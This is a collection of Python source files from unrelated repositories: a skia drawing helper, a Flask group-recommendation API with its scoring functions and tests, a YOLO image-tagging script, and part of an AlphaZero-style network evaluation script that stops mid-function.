cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.scale(sx, sy)
self._canvas.translate(-cx, -cy)
else:
self._canvas.scale(sx, sy)
def skew(self, sx, sy=0, center=(0, 0)):
cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.skew(math.radians(sx), math.radians(sy))
self._canvas.translate(-cx, -cy)
else:
self._canvas.skew(math.radians(sx), math.radians(sy))
def transform(self, matrix, center=(0, 0)):
m = skia.Matrix()
m.setAffine(matrix)
cx, cy = center
if cx != 0 or cy != 0:
self._canvas.translate(cx, cy)
self._canvas.concat(m)
self._canvas.translate(-cx, -cy)
else:
self._canvas.concat(m)
@contextlib.contextmanager
def savedState(self):
self._stack.append(self._gstate.copy())
self._canvas.save()
yield
self._canvas.restore()
self._gstate = self._stack.pop()
def saveImage(self, fileName):
if self._document.isDrawing:
self._document.endPage()
self._document.saveImage(fileName)
# Helpers
def _drawItem(self, canvasMethod, *items):
if self._gstate.fillPaint.somethingToDraw:
canvasMethod(*items, self._gstate.fillPaint.skPaint)
if self._gstate.strokePaint.somethingToDraw:
canvasMethod(*items, self._gstate.strokePaint.skPaint)
def _colorArgs(args):
"""Convert drawbot-style fill/stroke arguments to a tuple containing
ARGB int values."""
if not args:
return None
alpha = 1
if len(args) == 1:
if args[0] is None:
return None
r = g = b = args[0]
elif len(args) == 2:
r = g = b = args[0]
alpha = args[1]
elif len(args) == 3:
r, g, b = args
elif len(args) == 4:
r, g, b, alpha = args
else:
assert 0
return tuple(min(255, max(0, round(v * 255))) for v in (alpha, r, g, b))
_blendModesList = [
'normal',
'multiply',
'screen',
'overlay',
'darken',
'lighten',
'colorDodge',
'colorBurn',
'softLight',
'hardLight',
'difference',
'exclusion',
'hue',
'saturation',
'color',
'luminosity',
'clear',
'copy',
'sourceIn',
'sourceOut',
'sourceAtop',
'destinationOver',
'destinationIn',
'destinationOut',
'destinationAtop',
'xOR',
'plusDarker',
'plusLighter',
]
_blendModes = set(_blendModesList)
``` |
{
"source": "13hannes11/bachelor_thesis_m.recommend",
"score": 3
} |
#### File: src/apis/recommender.py
```python
from flask_restplus import Namespace, Resource, fields
from .config import config_model
from managers.recommendation_manager import RecommendationManager
from model.configuration_model import ConfigurationModel
from model.preferences_model import Preferences
api = Namespace('recommender', description='Recommendation related operations')
rating_model = api.model('Rating', {
'code': fields.String(required=True, description='The code that was rated'),
'value': fields.Float(required=True, description='The rating value'),
})
preference_model = api.model('Preference', {
'user': fields.String(required=True, description='The user identifier'),
'ratings': fields.List(fields.Nested(rating_model),required=True, description='The list of ratings of this user'),
})
recommendation_request_model = api.model('Recommendation Request', {
'configuration': fields.Nested(config_model, required=True, description='The user identifier'),
'preferences': fields.List(fields.Nested(preference_model),required=True, description='The list of ratings of this user'),
})
@api.route('/')
class Recommendation(Resource):
manager = RecommendationManager()
@api.doc('get_recommendation')
@api.expect(recommendation_request_model)
@api.marshal_list_with(config_model)
def post(self):
'''Get recommendation'''
result = self.manager.getRecommendation(Preferences(api.payload), ConfigurationModel(api.payload['configuration']))
response = result
return response
```
#### File: src/model/configuration_model.py
```python
from typing import List
class ConfigurationVariablesModel:
def __init__(self, data):
self.value : str = data['value']
self.code : str = data['code']
class ConfigurationModel:
def __init__(self, data):
self.configuration : List[str] = []
self.variables : List[ConfigurationVariablesModel] = []
if data is not None:
self.configuration = data['configuration']
if 'variables' in data:
for v in data['variables']:
self.variables.append(ConfigurationVariablesModel(v))
```
#### File: src/model/preferences_model.py
```python
from typing import List
class Rating:
def __init__(self, data):
self.code = data['code']
self.value = float(data['value'])
if self.value < 0 or self.value > 1:
raise ValueError("Value of rating has to be in interval [0,1]")
def getValue(self):
""" Returns rating value """
return self.value
class UserPreference:
def __init__(self, data):
self.ratings : List[Rating] = []
self.user : str = data['user']
for rat in data['ratings']:
self.ratings.append(Rating(rat))
def getAllRatings(self) -> List[Rating]:
return self.ratings
def getRatingByCode(self, code : str) -> Rating:
return next(filter(lambda x : x.code == code, self.ratings), Rating({'code': code, 'value': 0.5 }))
class Preferences:
def __init__(self, data={ 'preferences' : [] }):
self.preferences : List[UserPreference] = []
for pref in data['preferences']:
self.preferences.append(UserPreference(pref))
def getAllUserPreferences(self) -> List[UserPreference]:
return self.preferences
def getAllRatingsByCode(self, code) -> List[Rating]:
list = []
for user_pref in self.preferences:
list.append(user_pref.getRatingByCode('code'))
return list
def getAllUsers(self) -> List[str] :
list = []
for userPref in self.preferences:
if userPref.user not in list :
list.append(userPref.user)
return list
def getRatingValueByUserAndCode(self, user, code) -> float:
for userPref in self.preferences:
if userPref.user == user :
for rating in userPref.ratings:
if rating.code == code:
return rating.getValue()
return 0.5
def getIndividualPreferences(self):
return list(map(lambda x: _create_preferences_and_add_user_pref(x), self.preferences))
def _create_preferences_and_add_user_pref(userPref):
tmp = Preferences()
tmp.preferences.append(userPref)
return tmp
```
#### File: src/scoring/preferences_functions.py
```python
from typing import List
from model.preferences_model import Preferences, Rating
from model.configuration_model import ConfigurationModel
from model.product_structure_model import ProductStructureModel
from scoring.list_functions import ListToValueFunction
from scoring.value_functions import MapToPercent
class PreferencesToListFunction:
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
return []
class FlattenPreferencesToListFunction(PreferencesToListFunction):
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list : List[Rating] = []
for user_pref in preferences.getAllUserPreferences():
for rating in user_pref.getAllRatings():
if rating.code in toRate.configuration:
list.append(rating.getValue())
else :
list.append(1 - rating.getValue())
return list
class SimplePerUserToListFunction(PreferencesToListFunction):
def __init__(self, listToValue : ListToValueFunction):
self.listToValueFunction = listToValue
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list = []
for user_pref in preferences.getAllUserPreferences():
user_list : List[float] = []
for rating in user_pref.getAllRatings():
if rating.code in toRate.configuration:
user_list.append(rating.getValue())
else :
user_list.append(1 - rating.getValue())
list.append(self.listToValueFunction.convertToFloat(user_list))
return list
class SimpleSelectedCharacteristicsToListFunction(PreferencesToListFunction):
def __init__(self, listToValue : ListToValueFunction):
self.listToValueFunction = listToValue
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
list = []
for user_pref in preferences.getAllUserPreferences():
user_list : List[float] = []
for code in toRate.configuration:
user_list.append(user_pref.getRatingByCode(code).getValue())
list.append(self.listToValueFunction.convertToFloat(user_list))
return list
class PerUserPerFeatureDistanceAverageToListFunction(PreferencesToListFunction):
def __init__(self, featureListToValue : ListToValueFunction, product_structure : ProductStructureModel):
self.featureListToValueFunction = featureListToValue
self.product_structure = product_structure
def convertToList(self, preferences : Preferences, toRate : ConfigurationModel) -> List[float]:
user_preferences = preferences.getAllUserPreferences()
feature_list = self.product_structure.get_list_of_features()
user_scores = []
for user_pref in user_preferences:
feature_scores = []
for feature in feature_list:
char_list = feature.get_children_characteristics()
in_to_rate_rating = 0
avg = 0
for char in char_list:
if char.elementId in toRate.configuration:
in_to_rate_rating = user_pref.getRatingByCode(char.elementId).getValue()
avg += user_pref.getRatingByCode(char.elementId).getValue()
if len(char_list) > 0 :
avg = avg / len(char_list)
map_function = MapToPercent(1,-1)
feature_scores.append(map_function.applyToValue(in_to_rate_rating - avg))
user_scores.append(self.featureListToValueFunction.convertToFloat(feature_scores))
return user_scores
```
#### File: src/scoring/value_functions.py
```python
import math
class ValueToValueFunction:
def applyToValue(self, value : float) -> float :
return value
class MapToPercent(ValueToValueFunction):
def __init__(self, max_val : float, min_val : float):
self.max_val = max_val
self.min_val = min_val
def applyToValue(self, value : float) -> float :
return (value - self.min_val) / abs(self.min_val - self.max_val)
class HighpassFilterFunction(ValueToValueFunction):
def __init__(self, cutoff : float, floor_value=0):
self.cutoff = cutoff
self.floor_value = floor_value
def applyToValue(self, value : float) -> float :
if value < self.cutoff:
return self.floor_value
else:
return value
class LowpassFilterFunction(ValueToValueFunction):
def __init__(self, cutoff : float, ceiling_value=1):
self.cutoff = cutoff
self.ceiling_value = ceiling_value
def applyToValue(self, value : float) -> float :
if value > self.cutoff:
return self.ceiling_value
else:
return value
class PowerFunction(ValueToValueFunction):
def __init__(self, power : float):
self.power = power
def applyToValue(self, value : float) -> float :
return math.pow(value, self.power)
```
#### File: tests/test_model/test_preference_model.py
```python
from model.preferences_model import Preferences, Rating, UserPreference
import math
import pytest
class TestRating:
def test_range_conversion_minus_one_to_zero(self):
data = {
'code': 'abs',
'value': 0
}
assert math.isclose(0, Rating(data).getValue())
def test_range_conversion_one_to_one(self):
data = {
'code': 'abs',
'value': 1
}
assert math.isclose(1, Rating(data).getValue())
def test_range_conversion_zero_to_half(self):
data = {
'code': 'abs',
'value': 0.5
}
assert math.isclose(0.5, Rating(data).getValue())
def test_value_to_large(self):
with pytest.raises(ValueError):
data = {
'code': 'abs',
'value': 1.1
}
rating = Rating(data)
def test_value_to_small(self):
with pytest.raises(ValueError):
data = {
'code': 'abs',
'value': -0.1
}
rating = Rating(data)
class TestUserPreference:
data = {
'user': "user0",
'ratings':[ {
'code': 'abs',
'value': 0
}, {
'code': '2',
'value': 1
}, {
'code': '3',
'value': 0.5
}
]
}
def test_get_all_ratings(self):
user_pref = UserPreference(self.data)
assert len(user_pref.getAllRatings()) == 3
def test_get_rating_by_code(self):
user_pref = UserPreference(self.data)
rating = user_pref.getRatingByCode('2')
assert rating.code == '2'
assert rating.getValue() == 1
def test_get_rating_by_code_default(self):
user_pref = UserPreference(self.data)
rating = user_pref.getRatingByCode('notFOUND')
assert rating.code == 'notFOUND'
assert rating.getValue() == 0.5
class TestPreferences:
preferences = Preferences({
'preferences': [
{
'user': "user0",
'ratings':[ {
'code': 'in_both',
'value': 0
}, {
'code': 'only_in_one',
'value': 1
}, {
'code': '3',
'value': 0.5
}
]
},
{
'user': "user1",
'ratings':[ {
'code': 'in_both',
'value': 1
}, {
'code': '3',
'value': 1
}
]
}
]
})
def test_get_all_user_preferences(self):
assert len(self.preferences.getAllUserPreferences()) == 2
def test_get_all_rating_by_code(self):
assert len(self.preferences.getAllRatingsByCode('only_in_one')) == 2
assert len(self.preferences.getAllRatingsByCode('in_both')) == 2
def test_get_all_users(self):
assert len(self.preferences.getAllUsers()) == 2
assert "user0" in self.preferences.getAllUsers()
assert "user1" in self.preferences.getAllUsers()
def test_get_rating_by_user_and_code(self):
assert self.preferences.getRatingValueByUserAndCode("user0", "only_in_one") == 1
def test_empty_preferences(self):
assert len(Preferences({ 'preferences' : []}).getAllUsers()) == 0
def test_getIndividual_preferences(self):
assert len(self.preferences.getIndividualPreferences()) == 2
```
#### File: tests/test_scoring/test_list_functions.py
```python
from scoring.list_functions import Average, Product
import math
class TestListToValueFunctionAverage:
def test_simple_average(self):
function = Average()
list = [0.0, 1.0]
assert math.isclose(0.5, function.convertToFloat(list))
class TestListToValueFunctionProduct:
def test_simple_product(self):
function = Product()
list = [0.5, 0.5]
assert math.isclose(0.25, function.convertToFloat(list))
```
#### File: tests/test_scoring/test_scoring_functions.py
```python
from scoring.scoring_functions import PreferenceScoring, RatioCharacteristicConfigurationPenalty, WeightedFeaturePenalty, ReduceScoring
from scoring.value_functions import ValueToValueFunction
from model.configuration_model import ConfigurationModel
from model.preferences_model import Preferences
from scoring.list_functions import Min, Average
from scoring.preferences_functions import FlattenPreferencesToListFunction
from model.product_structure_model import ProductStructureModel
preferences = Preferences({
'preferences': [
{
'user': "user0",
'ratings':[ {
'code': 'A1',
'value': 0
}, {
'code': 'A2',
'value': 1
}, {
'code': 'B1',
'value': 0.5
}
]
},
{
'user': "user1",
'ratings':[ {
'code': 'A1',
'value': 1
}, {
'code': 'B2',
'value': 1
}
]
}
]
})
currentConfiguration = ConfigurationModel({
'configuration': ['A2', 'B2'],
'variables': []
})
toRate = ConfigurationModel({
'configuration': ['A1', 'B2'],
'variables': []
})
product_structure = ProductStructureModel({
'ProductStructure': [
{
'elementId': 'A',
'name': 'parent_element A',
'type': "FEATURE",
'additionalData': [],
'children': [
{
'elementId': 'A1',
'name': 'child A1',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
},
{
'elementId': 'A2',
'name': 'child A2',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
}
],
},{
'elementId': 'B',
'name': 'parent_element B',
'type': "FEATURE",
'additionalData': [],
'children': [
{
'elementId': 'B1',
'name': 'child B1',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
},
{
'elementId': 'B2',
'name': 'child B2',
'children': [],
'additionalData': [],
'type': "CHARACTERISTIC"
}
],
},
]
})
class TestRatioCharacteristicConfigurationPenalty:
def test_simple_example(self):
function = RatioCharacteristicConfigurationPenalty(product_structure, [ValueToValueFunction()])
assert 0.5 == function.calc_score(currentConfiguration, preferences, toRate)
class TestWeightedFeaturePenalty:
def test_simple_example(self):
function = WeightedFeaturePenalty(product_structure, Min(), Average())
assert 0.375 == function.calc_score(currentConfiguration, preferences, toRate)
class TestReduceScoring:
def test_combined(self):
function = ReduceScoring([
RatioCharacteristicConfigurationPenalty(product_structure, [ValueToValueFunction()]),
WeightedFeaturePenalty(product_structure, Min(), Average())
])
assert 0.875 == function.calc_score(currentConfiguration, preferences, toRate)
def test_none(self):
function = ReduceScoring([])
assert 0 == function.calc_score(currentConfiguration, preferences, toRate)
class TestPreferenceScoring:
def test_simple_example(self):
function = PreferenceScoring(
FlattenPreferencesToListFunction(),
Min()
)
assert 0 == function.calc_score(currentConfiguration, preferences, toRate)
```
#### File: tests/test_scoring/test_value_functions.py
```python
from scoring.value_functions import MapToPercent, ValueToValueFunction, HighpassFilterFunction, LowpassFilterFunction, PowerFunction
import math
class TestMapToPercent:
def test_range_conversion(self):
function = MapToPercent(-20, -40)
assert math.isclose(1, function.applyToValue(-20))
assert math.isclose(0, function.applyToValue(-40))
assert math.isclose(0.5, function.applyToValue(-30))
class TestValueToValueFunction:
def test_same_value(self):
function = ValueToValueFunction()
assert math.isclose(10, function.applyToValue(10))
class TestHighpassFilterFunction:
def test_higher_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0.8, function.applyToValue(0.8))
def test_lower_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0, function.applyToValue(0.3))
def test_same_value(self):
function = HighpassFilterFunction(0.5)
assert math.isclose(0.5, function.applyToValue(0.5))
class TestLowpassFilterFunction:
def test_higher_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(1, function.applyToValue(0.8))
def test_lower_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(0.3, function.applyToValue(0.3))
def test_same_value(self):
function = LowpassFilterFunction(0.5)
assert math.isclose(0.5, function.applyToValue(0.5))
class TestPowerFunction:
def test_power_one(self):
function = PowerFunction(10)
assert math.isclose(1, function.applyToValue(1))
def test_power_small_number(self):
function = PowerFunction(4)
assert math.isclose(0.0001, function.applyToValue(0.1))
``` |
{
"source": "13idyut/Y_Stub",
"score": 3
} |
#### File: 13idyut/Y_Stub/app.py
```python
import tensorflow as tf
import glob
from model.yolo import Yolo_v3
import argparse
from utils.detect import load_images, load_class_names, draw_boxes, load_weights
from utils.stub import word_dictionary, pre_final_dictionary, final_dictionary, is_are, comma_and_placement
import emoji
def paragraph_generator(contents):
with open('answer.txt', 'w') as answer:
if contents == '':
answer.write('No tag detected in the image.')
else:
answer.write(' '.join([str(item) for item in and_tag]) + ' ' +
is_tag + ' there in the given image.')
_MODEL_SIZE = (416, 416)
parser = argparse.ArgumentParser()
parser.add_argument(
'images', nargs='*', help='Must take in an image', type=str)
args = parser.parse_args()
image = vars(args)
image_list = image['images']
img = image_list[0]
img_names = glob.glob(img)
batch_size = len(img_names)
batch = load_images(img_names, model_size=_MODEL_SIZE)
class_names = load_class_names('./labels/coco.names')
n_classes = len(class_names)
max_output_size = 10
iou_threshold = 0.5
confidence_threshold = 0.7
model = Yolo_v3(
n_classes=n_classes,
model_size=_MODEL_SIZE,
max_output_size=max_output_size,
iou_threshold=iou_threshold,
confidence_threshold=confidence_threshold)
inputs = tf.placeholder(tf.float32, [batch_size, 416, 416, 3])
detections = model(inputs, training=False)
model_vars = tf.global_variables(scope='yolo_v3_model')
assign_ops = load_weights(model_vars, './weights/yolov3.weights')
with tf.Session() as sess:
sess.run(assign_ops)
detection_result = sess.run(detections, feed_dict={inputs: batch})
draw_boxes(img_names, detection_result, class_names, _MODEL_SIZE)
tf.reset_default_graph()
file = open('tag.txt', 'r')
contents = file.read()
words = contents.split('\n')
words = words[:-1]
sorted_words = sorted(words)
word_dictionary = word_dictionary(sorted_words)
final_dictionary = final_dictionary(pre_final_dictionary(word_dictionary))
is_tag = is_are(final_dictionary)
and_tag = comma_and_placement(final_dictionary)
paragraph_generator(contents)
print('\n\n\nAnswer generated Succesfully {}'.format(
emoji.emojize(":grinning_face_with_big_eyes:")))
``` |
{
"source": "13jacole/5e_GM_Tools",
"score": 4
} |
#### File: 5e_GM_Tools/Character_Gen/AbilityScore.py
```python
import random
#Function for ability scores
def ScoreGen():
while True:
print("You have chosen to generate new ability scores")
print("Please choose the number corresponding to your desired score generation method:\n")
print("1. Standard Array\n")
print("2. 4d6 drop lowest\n")
print("3. 3d6\n")
print("4. Custom scores\n")
dec = input()
if dec == "1":
method = 1
break
elif dec == "2":
method = 2
break
elif dec == "3":
method = 3
break
elif dec == "4":
method = 4
break
else:
print("Invalid method type. Please try again.\n")
while True:
print("Do you want to randomize your score placement? (Y/N):")
dec = input()
if dec.lower() == "y" or dec.lower() == "yes" or dec.lower() == "ye":
ra = True
break
elif dec.lower() == "n" or dec.lower() == "no":
ra = False
break
else:
print("Invalid input. Please try again")
#Call Function that generates scores
AbSc = [] # Str, Dex, Con, Int, Wis, Cha
# Generate scores
if method == 1: #Standard array
AbSc = [15, 14, 13, 12, 10, 8]
if method == 2: #4d6 drop lowest
for x in range(0, 6):
nums = []
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.sort()
nums[0] = 0
Score = sum(nums)
AbSc.append(Score)
if method == 3: #3d6
for x in range(0, 6):
nums = []
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
nums.append(random.randint(1, 6))
Score = sum(nums)
AbSc.append(Score)
if method == 4: #Custom
for x in range(0, 6):
print("Please enter score " + str(x+1) + "\n")
AbSc.append(int(input()))
# Place scores
if ra:
random.shuffle(AbSc)
else:
Sc = AbSc
AbSc = []
Ab = ["Str", "Dex", "Con", "Int", "Wis", "Cha"]
while len(Ab) > 0:
print("Scores\n")
print("--")
for x in range(0, len(Sc)):
print(str(Sc[x]))
print("--")
print("\nPlease indicate which of the above scores you want to assign as your "+Ab[0]+ " Score: ")
dec = int(input())
if int(dec) in Sc:
AbSc.append(dec)
Sc.remove(dec)
del Ab[0]
else:
print("Not a valid value. Please try again.")
print("------")
return AbSc
```
#### File: Character_Gen/Races/Gnome.py
```python
import numpy as np
import pandas as pd
import random
def Darkvision():
Name = "Darkvision"
Feature = "You can see in dim light within 60 feet as if it were bright light, and in darkness as if it were dim light. You can't descern color in darkness, only shades of gray."
return Name, Feature
def GnomeCunning():
Name = "<NAME>"
Feature = "You have advantage on all Intelligence, Wisdom, and Charisma saving throws against magic."
return Name, Feature
``` |
{
"source": "13k/dota2-tools-proton",
"score": 3
} |
#### File: dota2-tools-proton/d2tp/dota2.py
```python
from __future__ import annotations
from pathlib import PosixPath
from .custom_game import CustomGame
class Dota2:
def __init__(self, path: str | PosixPath) -> None:
self.path: PosixPath = PosixPath(path).resolve()
self.content_path: PosixPath = self.path / "content"
self.addons_content_path: PosixPath = self.content_path / "dota_addons"
self.game_path: PosixPath = self.path / "game"
self.addons_game_path: PosixPath = self.game_path / "dota_addons"
self.compiler_path: PosixPath = self.game_path / "bin" / "win64" / "resourcecompiler.exe"
def custom_game(self, name: str, src_path: str | PosixPath) -> CustomGame:
return CustomGame(self, name, src_path)
```
#### File: dota2-tools-proton/d2tp/version.py
```python
from __future__ import annotations
from pathlib import Path
from typing import Any, Final, NamedTuple, Type, TypeVar
ProtonVersionT = TypeVar("ProtonVersionT", bound="ProtonVersion")
ERRF_INVALID_VERSION_FILE: Final = "Invalid proton version file {file}"
ERRF_INVALID_VERSION_STRING: Final = "Invalid proton version string in file {file}: {version!r}"
class ProtonVersion(NamedTuple):
"""Proton version"""
major: int
minor: int
prefix: int
@classmethod
def parse(cls: Type[ProtonVersionT], value: str | Any) -> ProtonVersionT | None:
if not isinstance(value, str):
return None
if "-" not in value:
return None
if "." not in value:
return None
proton, prefix = value.split("-", 1)
major, minor = proton.split(".", 1)
return cls(int(major), int(minor), int(prefix))
@classmethod
def parse_file(cls: Type[ProtonVersionT], file: Path) -> ProtonVersionT:
lines = file.read_text(encoding="utf-8").splitlines()
if len(lines) != 1:
raise ValueError(ERRF_INVALID_VERSION_FILE.format(file=file))
_, vstr = lines[0].split(" ", 1)
version = cls.parse(vstr.removeprefix("proton-"))
if version is None:
raise ValueError(ERRF_INVALID_VERSION_STRING.format(file=file, version=lines[0]))
return version
def __str__(self) -> str:
# pylint: disable=missing-format-attribute
return "{0.major}.{0.minor}-{0.prefix}".format(self)
# pylint: enable=missing-format-attribute
``` |
{
"source": "13lift/OpenHackathonPlatform",
"score": 2
} |
#### File: lifter/hack/models.py
```python
from uuid import uuid4
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model
User = get_user_model()
from django.db import models
from lifter.profiles.models import City
class Hacker(models.Model):
"""
Участник команды
"""
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
skils = models.CharField(max_length=32)
rating = models.PositiveIntegerField()
github = models.URLField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class TeamStatus(object):
"""
Статусы команды
"""
NOT_READY = 0
READY = 1
EXCLUDED = -1
CHOICES = (
(NOT_READY, 'Team NOT ready'),
(READY, 'Team ready!'),
(EXCLUDED, 'excluded'),
)
class Team(models.Model):
"""
Команда хакатона
"""
members = models.ManyToManyField(Hacker)
name = models.CharField(max_length=32)
info = models.CharField(max_length=255)
github = models.URLField()
presentation = models.FileField()
image = models.ImageField()
leader = models.ForeignKey(
Hacker,
on_delete=models.DO_NOTHING,
related_name='leader'
)
status = models.SmallIntegerField(
db_index=True,
choices=TeamStatus.CHOICES,
default=TeamStatus.NOT_READY,
verbose_name=_('Статус команды')
)
# TODO: сделать в процентах
progress = models.PositiveSmallIntegerField()
rating = models.PositiveIntegerField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Organizer(models.Model):
name = models.CharField(max_length=32)
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
city = models.ForeignKey(
City,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
description = models.TextField()
image = models.ImageField()
url = models.URLField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Sponsor(models.Model):
name = models.CharField(max_length=32)
manager = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
description = models.TextField()
url = models.URLField()
image = models.ImageField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Hackathon(models.Model):
user = models.ForeignKey(
User,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
sponsor = models.ManyToManyField(Sponsor)
organizer = models.ForeignKey(Organizer, on_delete=models.DO_NOTHING)
name = models.CharField(max_length=32)
url = models.URLField(max_length=150)
startDate = models.DateTimeField()
endDate = models.DateTimeField()
address = models.CharField(max_length=32)
city = models.ForeignKey(
City,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
info = models.CharField(max_length=32)
program = models.TextField()
description = models.TextField()
image = models.ImageField()
slug = models.SlugField(
max_length=20,
blank=False,
)
def __str__(self):
return self.slug
class Nomination(models.Model):
"""
Призовые номинации
"""
name = models.CharField(max_length=32)
sponsor = models.ForeignKey(
Sponsor,
on_delete=models.DO_NOTHING,
blank=True,
null=True,
)
hackathon = models.ForeignKey(
Hackathon,
on_delete=models.DO_NOTHING,
blank=False,
null=False,
)
teams = models.ManyToManyField(
Team,
blank=True,
)
info = models.CharField(max_length=32, blank=True)
description = models.TextField(blank=True)
image = models.ImageField(blank=True)
prize = models.PositiveSmallIntegerField(blank=True)
def __str__(self):
return self.name
``` |
{
"source": "13rian/alpha-zero-framework",
"score": 3
} |
#### File: 13rian/alpha-zero-framework/evaluation.py
```python
import logging
import random
import os
import torch
import numpy as np
import matplotlib.pyplot as plt
from globals import CONST, config
import mcts
from mcts import MCTS
import data_storage
from utils import utils
torch_device = config.evaluation_device
class BoardWrapper:
def __init__(self, board, white_network_number):
self.board = board
self.white_network_number = white_network_number # number of the white player network
<EMAIL>
def main_evaluation(game_class, result_folder):
# configuration values
game_count = 200 # the number of test games to play
mcts_sim_count = 200 # the number of mcts simulations to perform
temp = 0.3 # the temperature used to get the policy for the move selection, gives some randomness
# the logger
utils.init_logger(logging.DEBUG, file_name="log/app.log")
logger = logging.getLogger('evaluation')
# set the random seed
random.seed(a=None, version=2)
np.random.seed(seed=None)
# load the network
network_dir = config.save_dir + "/networks/"
path_list = os.listdir(network_dir)
path_list.sort(key=utils.natural_keys)
# let all network play against the last generation without any mcts
best_net_path = network_dir + path_list[-1]
best_net = data_storage.load_net(best_net_path, torch_device)
generation = []
prediction_score = []
for i in range(len(path_list)):
generation.append(i)
net_path = network_dir + path_list[i]
net = data_storage.load_net(net_path, torch_device)
score = net_vs_net_prediction(net, best_net, game_count, game_class)
prediction_score.append(score)
logger.debug("prediction score: {}, network: {}".format(score, net_path))
# let all network play against the last generation with mcts
mcts_score = []
path_list = [] # [path_list[0], path_list[-2]]
for i in range(len(path_list)):
net_path = network_dir + path_list[i]
net = data_storage.load_net(net_path, torch_device)
score = net_vs_net_mcts(net, best_net, mcts_sim_count, temp, game_count, game_class)
mcts_score.append(score)
logger.debug("mcts_score score: {}, network: {}".format(score, net_path))
# save the results
np.save(result_folder +"/net_vs_net_pred.npy", np.array(prediction_score))
np.save(result_folder + "/net_vs_net_mcts.npy", np.array(mcts_score))
np.save(result_folder + "/net_vs_net_gen.npy", np.array(generation))
# set the style of the plot
plt.style.use('seaborn-dark-palette')
# plot the prediction score
fig1 = plt.figure(1)
plt.plot(generation, prediction_score)
axes = plt.gca()
axes.set_ylim([0, 0.55])
axes.grid(True, color=(0.9, 0.9, 0.9))
plt.title("Prediction Score vs Best Network")
plt.xlabel("Generation")
plt.ylabel("Prediction Score")
fig1.show()
# # plot the mcts score
# fig2 = plt.figure(2)
# plt.plot(generation, mcts_score)
# axes = plt.gca()
# axes.set_ylim([0, 0.55])
# axes.grid(True, color=(0.9, 0.9, 0.9))
# plt.title("MCTS Prediction Score vs Best Network")
# plt.xlabel("Generation")
# plt.ylabel("MCTS Score")
# fig2.show()
plt.show()
def net_vs_net_prediction(net1, net2, game_count, game_class):
"""
plays the two passed network against each other, in half of the games net1 is white and in the other half net2
is white. to get the policy only the network prediction is used without any mcts simulations. the move to play
is sampled from the policy distribution. playing deterministically makes no sense as the same games would just be
repeated over and over again
:param net1: network 1
:param net2: network 2
:param game_count: the number of games to play in total, half of the games are played as white and the other half as black
:param game_class: the class of the game
:return: score of net1, the score is in the range of 0-1 where:
0: loss
0.5: draw
1: win
"""
half_count = game_count // 2
board_wrapper_list = []
for i in range(2*half_count):
if i < half_count:
board_wrapper_list.append(BoardWrapper(game_class(), CONST.WHITE)) # net1 is white
else:
board_wrapper_list.append(BoardWrapper(game_class(), CONST.BLACK)) # net2 is white
all_terminated = False
while not all_terminated:
batch_list1 = []
batch_list2 = []
idx_list1 = []
idx_list2 = []
for idx, board_wrapper in enumerate(board_wrapper_list):
# skip finished games
if board_wrapper.board.is_terminal():
continue
# get the white perspective
sample, player = board_wrapper.board.white_perspective()
if player == CONST.WHITE:
if board_wrapper.white_network_number == 1:
batch_list1.append(sample)
idx_list1.append(idx)
else:
batch_list2.append(sample)
idx_list2.append(idx)
else:
if board_wrapper.white_network_number == 1:
batch_list2.append(sample)
idx_list2.append(idx)
else:
batch_list1.append(sample)
idx_list1.append(idx)
# get the policy form the network
if len(batch_list1) > 0:
batch1 = torch.Tensor(batch_list1).to(torch_device)
policy1, _ = net1(batch1)
policy1 = policy1.detach().cpu().numpy()
else:
policy1 = None
if len(batch_list2) > 0:
batch2 = torch.Tensor(batch_list2).to(torch_device)
policy2, _ = net2(batch2)
policy2 = policy2.detach().cpu().numpy()
else:
policy2 = None
if policy1 is not None:
for i_batch in range(policy1.shape[0]):
# set the illegal moves to 0
policy = policy1[i_batch]
idx = idx_list1[i_batch]
illegal_moves = board_wrapper_list[idx].board.illegal_actions()
policy[illegal_moves] = 0
# choose an action according to the probability distribution of all legal actions
policy /= np.sum(policy)
action = np.random.choice(len(policy), p=policy)
# execute the best legal action
board_wrapper_list[idx].board.execute_action(action)
if policy2 is not None:
for i_batch in range(policy2.shape[0]):
# set the illegal moves to 0
policy = policy2[i_batch]
idx = idx_list2[i_batch]
illegal_moves = board_wrapper_list[idx].board.illegal_actions()
policy[illegal_moves] = 0
# choose an action according to the probability distribution of all legal actions
policy /= np.sum(policy)
action = np.random.choice(len(policy), p=policy)
# execute the best legal action
board_wrapper_list[idx].board.execute_action(action)
# check if all boards are terminated
all_terminated = True
for board_wrapper in board_wrapper_list:
if not board_wrapper.board.is_terminal():
all_terminated = False
break
# calculate the score of network 1
score = 0
for board_wrapper in board_wrapper_list:
reward = (board_wrapper.board.reward() + 1) / 2
if board_wrapper.white_network_number == 1:
score += reward # net1 is white
else:
